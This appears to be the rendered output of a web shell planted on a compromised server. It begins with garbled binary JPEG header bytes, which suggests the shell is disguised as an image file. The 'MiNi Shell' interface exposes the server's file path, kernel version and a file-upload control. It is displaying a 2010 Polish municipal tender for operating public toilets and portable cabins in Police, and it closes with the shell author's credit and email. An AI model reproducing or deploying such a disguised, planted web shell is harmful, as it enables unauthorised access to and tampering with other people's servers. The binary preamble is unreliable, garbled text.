JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101122/378090-N-2010.html

<p class="kh_header"><b>Police: I.    Eksploatacja 2 szaletów miejskich z obsługą personalną.      
    II. Obsługa 12 kabin wolnostojących zlokalizowanych na terenie Gminy Police oraz 2-4 kabin na plaży w sezonie letnim.

w okresie 12 miesięcy, tj. od 1.01.2011 do 31.12.2011</b><br>
<b>Numer ogłoszenia: 378090 - 2010; data zamieszczenia: 22.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej i Mieszkaniowej , ul. Bankowa 18, 72-010 Police, woj. zachodniopomorskie, tel. 091 4311350, faks 091 3175037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zgkim.police.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> I.    Eksploatacja 2 szaletów miejskich z obsługą personalną.      
    II. Obsługa 12 kabin wolnostojących zlokalizowanych na terenie Gminy Police oraz 2-4 kabin na plaży w sezonie letnim.

w okresie 12 miesięcy, tj. od 1.01.2011 do 31.12.2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zał. nr 1 do SIWZ -

WYKAZ SZALETÓW, OPIS ICH WYPOSAŻENIA  
oraz  WARUNKI WYKONANIA USŁUGI .

Przedmiot zamówienia: 	   

Eksploatacja szaletów miejskich na terenie Gminy Police .

Lokalizacja:		  

dwa szalety miejskie stacjonarne w Policach:
-	przy Pl. Chrobrego							- 1 szt,
-	przy skrzyżowaniu ulic Piłsudskiego/Wyszyńskiego		- 1 szt,

trzy kabiny wolnostojące usytuowane przy n/w ulicach:
-	w Policach, ul. Piłsudskiego,  przy sklepie DOM-LUX	- 1 szt,
-	w Policach-Jasienicy przy Banku Spółdzielczym		- 1 szt, 
-	w Policach-Jasienicy, ul. Piastów  przy pętli autobusowej	- 1 szt,

dziewięć kabin wolnostojących na terenie cmentarzy:
-	w Policach, ul. Tanowska na terenie cmentarza		- 5 szt,
-	w Policach-Jasienicy na terenie cmentarza			- 1 szt,
-	w Niekłończycy na terenie cmentarza				- 1 szt,
-	w Przęsocinie na terenie cmentarza				- 1 szt,
-	w Trzebieży na terenie cmentarza				- 1 szt 

oraz 2-4 kabiny wolnostojące zlokalizowane w Trzebieży na plaży w sezonie letnim (od czerwca do września).


Ogólna charakterystyka obiektów:

1.	Szalet miejski przy Placu Chrobrego:
-	Pomieszczenia w obiekcie użyteczności publicznej,
-	Powierzchnia użytkowa  - 31,03 m2,

-	Czynny tylko w dni powszednie w godz. od 10,00 do 18,00, tj. 8 godz.   dziennie.

-	Wyposażenie w instalacje techniczne i urządzenia:
-	Ogrzewanie c.o. z kotłowni lokalnej, gazowej,
-	Instalacja wod-kan: 
miski ustępowe - 4 szt, umywalki - 3 szt, pisuary - 3 szt,
-	Instalacja elektryczna: 
bojler elektryczny - 1 szt, suszarka do rąk - 2 szt, grzejnik el. - 1 szt .

2.	Szalet miejski przy ul. Piłsudskiego/Wyszyńskiego:
-	Obiekt wolnostojący,
-	Powierzchnia użytkowa  - 60,60 m2,

-	Czynny:
-	w dni powszednie w godz. 	od   7,00 do 21,00 
-	w soboty w godz. 			od   8,00 do 21,00
-	w dni wolne od pracy w godz. od 10,00 do 18,00

-	w dniach 01 stycznia i 25 grudnia szalet będzie nieczynny  . 




- Wyposażenie w instalacje techniczne i urządzenia:
-	Ogrzewanie elektryczne, lokalne,
-	Instalacja wod-kan: 
miski ustępowe - 8 szt, umywalki - 8 szt, pisuary - 3szt,
-	Instalacja elektryczna:  
piece grzewcze -  8 szt, bojler elektr. - 1 szt, suszarki do rąk - 6 szt,
-	Instalacja alarmowa - urządzenia elektroniczne do monitoringu (ochrony obiektu),
-	W szalecie  wydzielone jest 1 pomieszczenie sanitarne z wejściem od strony zaplecza przystosowane dla osób niepełnosprawnych ruchowo,
-	W szalecie  Zamawiający  wydzielił dwa pomieszczenia sanitarne w.c damskie i w.c. męskie o pow. 11,2 m2 dla osób prowadzących stale działalność handlową na targowisku miejskim w Policach. Zasady nieodpłatnego korzystania z w.c określi wykonawca w porozumieniu zawartym z przedstawicielem Targowiska  .

3.	Suche kabiny w.c. w ilości 3 szt. (usytuowane w różnych punktach miasta),  udostępnione do użytkowania przez całą dobę .

4.	Suche kabiny w.c. w ilości 9 szt. (usytuowane na cmentarzach w Policach, ul. Tanowska, w Policach-Jasienicy, Przęsocinie, Niekłończycy i Trzebieży),  udostępnione do użytkowania w godzinach otwarcia cmentarzy .

5.	W sezonie letnim, udostępniane są suche kabiny na plaży w Trzebieży - max 4 kabiny (obsługa w okresie od czerwca do września) udostępnione do użytkowania przez całą dobę .
Wykonawca przejmie kabiny wymienione w p. 3, 4 i 5 sprawne technicznie .

Ogólna charakterystyka usług:

Wykonawca zobowiązany jest do:

a)	zapewnienia obsługi personalnej, do udostępnienia szaletów i nadzoru nad ich użytkowaniem w godzinach ustalonych dla poszczególnych obiektów, 
b)	wyposażenia pracowników obsługi w narzędzia, sprzęt, materiały do utrzymania czystości i środki sanitarno - higieniczne, niezbędne do właściwego użytkowania i utrzymania obiektów,
c)	utrzymania prawidłowego stanu technicznego obiektów i kabin, tj:
-	wymiana zużytych elementów: żarówek, desek sedesowych, kratek,
-	naprawa drzwi, naprawa bądź wymiana zamków, klamek, 
-	naprawa bądź wymiana baterii umywalkowych, zaworów wodnych,
-	udrażnianie pisuarów, muszli klozetowych oraz umywalek,
-	bieżąca naprawa instalacji elektrycznej, wymiana bądź naprawa łączników i gniazd elektrycznych,  
-	czyszczenie rynien, 
d)	utrzymania prawidłowego stanu sanitarno - higienicznego (w tym odkaraluszanie) i estetycznego obiektów i pomieszczeń, 
e)	utrzymania czystości w obiektach i ich bezpośrednim otoczeniu,
f)	bieżącego oczyszczania zbiorników na nieczystości w suchych kabinach wolnostojących, z każdorazowym wlaniem płynu dezynfekującego zapachowego do pojemników na fekalia (średnio 2-3 razy w miesiącu),
g)	bieżącego opróżniania koszy i pojemników na śmieci ustawionych dla potrzeb szaletów,
h)	zapewnienia w okresie zimowym skrzyń z piaskiem do posypywania chodników przy szaletach w zabudowie stałej,
i)	oszczędnego gospodarowania wodą, energią cieplną i elektryczną,


j)	wykonywania bieżących napraw urządzeń, instalacji technicznych armatury oraz wyposażenia szaletów i kabin wolnostojących (wyszczególnionych w pkt c),
k)	wnioskowania o wykonanie w obiektach remontów i modernizacji oraz uzgadniania z Zamawiającym ich zakresu, trybu i terminu realizacji,
l)	zabezpieczenia eksploatowanych szaletów przed ogniem, kradzieżą                i dewastacją (szalet przy ul. Piłsudskiego/Wyszyńskiego wyposażony jest w instalację alarmową, koszty z tytułu zabezpieczenia obiektu ponosi Wykonawca usługi),
m)	zapewnienie transportu i przewiezienie kabin wolnostojących do Trzebieży przed sezonem letnim i ponowny transport po sezonie na miejsce wskazane przez Zamawiającego  ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Obsługa 3 dodatkowych kabin wolnostojących.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.30.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie  wadium  
w wysokości :
Zadanie I		800 zł  (OSIEMSET zł) ;
Zadanie II		800 zł  (OSIEMSET zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>którzy w okresie ostatnich trzech lat wykonali co najmniej 2 zamówienia                        	w zakresie 	zbliżonym do niniejszego zamówienia (obsługa szaletów, ew. 	sprzątanie lub dozorowanie obiektów publicznych, ew. wywóz nieczystości), 	potwierdzone referencjami.
	Ocena spełnienia warunku na podstawie dokumentów wymaganych wg zał. nr 2 do 	SIWZ p. 3 i 4.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadający opłaconą polisę ubezpieczeniową od odpowiedzialności cywilnej               w zakresie prowadzonej działalności gospodarczej na kwotę min. 100.000 zł.
	Ocena spełnienia warunku na podstawie dokumentów wymaganych wg zał. nr 2 do 	SIWZ p. 7.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Dowód wniesienia wadium.

2.	Formularz oferty - zgodnie z otrzymanym wzorem - zał. nr 4a, 4b.

10.	Określenie części zamówienia które wykonawca zamierza powierzyć (lub nie zamierza) podwykonawcom - wg zał. nr 8</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art. 144 ust. 1 ustawy PZP Zamawiający przewiduje możliwość wprowadzenia zmian postanowień umowy zawartej w wyniku rozstrzygnięcia postępowania, gdy zaistnieje niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie z SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zgkim.police.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia w wersji elektronicznej można uzyskać na stronie internetowej, w wersji drukowanej można otrzymać w siedzibie ZGKiM Police, pokój 310.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2010 godzina 09:30, miejsce: Zamkniętą kopertę zawierającą ofertę należy złożyć w sekretariacie ZGKiM Police, ul. Bankowa 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I.    Eksploatacja 2 szaletów miejskich z obsługą personalną.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dwa szalety miejskie stacjonarne w Policach:
-	przy Pl. Chrobrego							- 1 szt,
-	przy skrzyżowaniu ulic Piłsudskiego/Wyszyńskiego		- 1 szt,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.30.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II. Obsługa 12 kabin wolnostojących zlokalizowanych na terenie Gminy Police oraz 2-4 kabin na plaży w sezonie letnim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trzy kabiny wolnostojące usytuowane przy n/w ulicach:
-	w Policach, ul. Piłsudskiego,  przy sklepie DOM-LUX	- 1 szt,
-	w Policach-Jasienicy przy Banku Spółdzielczym		- 1 szt, 
-	w Policach-Jasienicy, ul. Piastów  przy pętli autobusowej	- 1 szt,

dziewięć kabin wolnostojących na terenie cmentarzy:
-	w Policach, ul. Tanowska na terenie cmentarza		- 5 szt,
-	w Policach-Jasienicy na terenie cmentarza			- 1 szt,
-	w Niekłończycy na terenie cmentarza				- 1 szt,
-	w Przęsocinie na terenie cmentarza				- 1 szt,
-	w Trzebieży na terenie cmentarza				- 1 szt,

oraz 2-4 kabiny wolnostojące zlokalizowane w Trzebieży na plaży w sezonie letnim (od czerwca do września)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.30.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com